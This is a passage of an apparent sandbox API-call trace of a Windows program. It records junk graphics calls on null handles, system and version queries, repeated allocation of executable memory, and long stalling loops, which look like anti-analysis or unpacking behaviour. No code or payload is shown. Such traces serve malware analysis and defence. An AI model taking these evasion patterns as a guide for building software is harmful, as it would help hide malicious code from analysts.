phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.272] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401d0 [0088.272] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401cd [0088.272] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041149 [0088.273] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104114a [0088.273] CombineRgn (hrgnDst=0x1041149, hrgnSrc1=0xbd0401d0, hrgnSrc2=0xbf0401cd, iMode=1) returned 1 [0088.273] CombineRgn (hrgnDst=0x104114a, hrgnSrc1=0xbd0401d0, hrgnSrc2=0xbf0401cd, iMode=4) returned 2 [0088.273] CreateSolidBrush (color=0xff) returned 0x2101148 [0088.273] CreateSolidBrush (color=0xff0000) returned 0x110114b [0088.273] DeleteObject (ho=0x110114b) returned 1 [0088.273] DeleteObject (ho=0xbf0401cd) returned 1 [0088.273] DeleteObject (ho=0xbd0401d0) returned 1 [0088.273] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.273] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.273] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.273] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.273] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.273] BeginPath (hdc=0x0) returned 0 [0088.273] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.273] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.273] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.273] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.273] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.273] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.273] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.273] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.273] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401cd [0088.273] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401d0 [0088.273] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104114c [0088.273] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104114d [0088.273] CombineRgn (hrgnDst=0x104114c, hrgnSrc1=0xc00401cd, hrgnSrc2=0xbe0401d0, iMode=1) returned 1 [0088.273] CombineRgn (hrgnDst=0x104114d, hrgnSrc1=0xc00401cd, hrgnSrc2=0xbe0401d0, iMode=4) returned 2 [0088.273] CreateSolidBrush (color=0xff) returned 0x210114b [0088.273] CreateSolidBrush (color=0xff0000) returned 0x110114e [0088.273] DeleteObject (ho=0x110114e) returned 1 [0088.273] DeleteObject (ho=0xbe0401d0) returned 1 [0088.274] DeleteObject (ho=0xc00401cd) returned 1 [0088.274] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.274] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.274] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.274] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.274] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.274] BeginPath (hdc=0x0) returned 0 [0088.274] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.274] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.274] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.274] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.274] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.274] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.274] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.274] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401d0 [0088.274] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401cd [0088.274] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104114f [0088.274] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041150 [0088.274] CombineRgn (hrgnDst=0x104114f, hrgnSrc1=0xbf0401d0, hrgnSrc2=0xc10401cd, iMode=1) returned 1 [0088.274] CombineRgn (hrgnDst=0x1041150, hrgnSrc1=0xbf0401d0, hrgnSrc2=0xc10401cd, iMode=4) returned 2 [0088.274] CreateSolidBrush (color=0xff) returned 0x210114e [0088.274] CreateSolidBrush (color=0xff0000) returned 0x1101151 [0088.274] DeleteObject (ho=0x1101151) returned 1 [0088.274] DeleteObject (ho=0xc10401cd) returned 1 [0088.274] DeleteObject (ho=0xbf0401d0) returned 1 [0088.274] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.274] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.274] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.274] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.275] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.275] BeginPath (hdc=0x0) returned 0 [0088.275] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.275] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.275] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.275] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.275] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.275] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.275] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401cd [0088.275] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401d0 [0088.275] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041152 [0088.275] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041153 [0088.275] CombineRgn (hrgnDst=0x1041152, hrgnSrc1=0xc20401cd, hrgnSrc2=0xc00401d0, iMode=1) returned 1 [0088.275] CombineRgn (hrgnDst=0x1041153, hrgnSrc1=0xc20401cd, hrgnSrc2=0xc00401d0, iMode=4) returned 2 [0088.275] CreateSolidBrush (color=0xff) returned 0x2101151 [0088.275] CreateSolidBrush (color=0xff0000) returned 0x1101154 [0088.275] DeleteObject (ho=0x1101154) returned 1 [0088.275] DeleteObject (ho=0xc00401d0) returned 1 [0088.275] DeleteObject (ho=0xc20401cd) returned 1 [0089.114] SendMessageA (hWnd=0x1013e, Msg=0xc, wParam=0x0, lParam=0x1885d4) returned 0x1 [0089.114] SendMessageA (hWnd=0x1013e, Msg=0xd, wParam=0x3e8, lParam=0x1885d4) returned 0x9 [0089.114] GetLastError () returned 0x578 [0089.115] lstrlenA (lpString="-") returned 1 [0089.115] GetTextExtentPointA (in: hdc=0x0, lpString="-", c=1, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0089.115] GetStockObject (i=13) returned 0x18a002e [0089.115] GetObjectA (in: h=0x18a002e, c=60, pv=0x18edf0 | out: pv=0x18edf0) returned 60 [0089.115] CreateFontIndirectA (lplf=0x18edf0) returned 0x0 [0089.115] SelectObject (hdc=0x0, h=0x20dfff5) returned 0x0 [0089.115] lstrlenA (lpString="99/99") returned 5 [0089.115] GetTextExtentPointA (in: hdc=0x0, lpString="99/99", c=5, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0089.115] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.115] ReleaseDC (hWnd=0x0, hDC=0x0) returned 0 [0089.164] EnumTimeFormatsA (lpTimeFmtEnumProc=0x2410590, Locale=0x400, dwFlags=0x0) [0089.165] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0089.165] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0089.205] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.226] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.228] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.237] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.421] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.422] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.432] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.433] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.443] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.445] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.455] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.456] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.599] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.600] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.610] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.612] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.624] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.626] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.792] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.794] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.806] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.808] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.820] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.822] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.834] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.938] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0089.938] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0089.950] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0089.955] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.964] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.966] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0089.976] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.978] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0090.073] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.075] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0090.085] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.087] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0090.097] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.099] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0090.111] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.112] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3350000 [0092.017] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.017] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.018] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.018] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.018] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.018] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.018] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.018] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.018] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.018] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.019] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.019] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.019] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.019] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.019] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.019] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.019] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.020] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.020] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.020] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.020] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.020] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.020] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.020] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.020] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.020] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.021] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.021] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.021] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.021] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.021] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.021] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.021] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.022] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.022] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.022] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.022] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.022] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.022] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.022] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.022] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.023] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.023] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.023] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.023] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.023] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.023] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.024] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.024] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.024] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.024] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.024] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.024] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.024] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.024] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.024] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.025] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.025] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.025] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.025] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.025] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.025] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.025] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.025] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.025] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.026] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.026] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.026] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.026] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.026] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.026] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.026] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.026] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.027] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.027] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.027] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.027] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.027] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.027] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.027] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.028] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.028] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.028] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.028] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.028] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.028] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.028] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.028] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.028] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.029] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.029] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.029] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.029] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.029] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.029] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.029] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.030] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.030] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.030] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.030] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.030] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.030] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.030] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.030] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.031] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.031] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.031] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.031] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.031] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.031] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.031] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.031] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.032] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.032] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.032] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.032] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.032] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.032] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.032] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.032] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.032] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.033] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.033] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.033] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.033] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.033] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.033] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.033] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.034] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.034] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.034] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.034] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.034] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.034] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.034] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.034] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.034] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.035] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 